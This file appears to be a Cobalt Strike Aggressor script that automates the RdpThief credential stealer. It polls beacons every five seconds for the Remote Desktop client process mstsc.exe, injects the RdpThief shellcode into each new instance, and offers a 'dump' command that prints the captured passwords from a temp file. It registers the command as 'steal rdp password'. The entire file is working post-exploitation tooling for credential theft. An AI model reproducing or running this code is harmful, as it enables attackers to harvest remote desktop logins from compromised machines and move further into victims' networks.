@beacons = @();
@pids = @();

on heartbeat_5s{

		foreach $index => $beaconid (@beacons)
		{
		   
		    bps($beaconid,&handleProcess);
		}	

}


sub handleProcess{
	
	$processList = $2;
	$index = indexOf($processList, "mstsc.exe", 0) + 9;

	if($index > 9){

		$temp = substr($processList,$index,-1);
		$pid = split("\t",$temp)[2];

		if ($pid !in @pids){
			add(@pids,$pid,0);
			blog($1,"Injecting into mstsc.exe with PID: $pid");
			bshinject($1, $pid , "x64" ,script_resource("third/rdpthief/RdpThief_x64.tmp"));
		}
		
	}
}



#append menus

alias rdpthief{
	if ($2 eq "start"){
		blog($1, "RdpThief enabled \n");
        add(@beacons,$1,0);
	}
	else if ($2 eq "stop"){
		blog($1, "Disabling RdpThief");
        remove(@beacons,$1);
	}
	else if ($2 eq "dump"){
		blog($1, "Dumping RdpThief");
		bshell($1,"type %temp%\\data.bin");
	}
	else{
		blog($1, "Invaild args ! Only support start,stop,dump");
	}

}

beacon_command_register(
	"rdpthief", 
	"steal rdp password", 
	"Start: inject mstsc.exe process.\nStop: stop capture.\nDump: view capture data");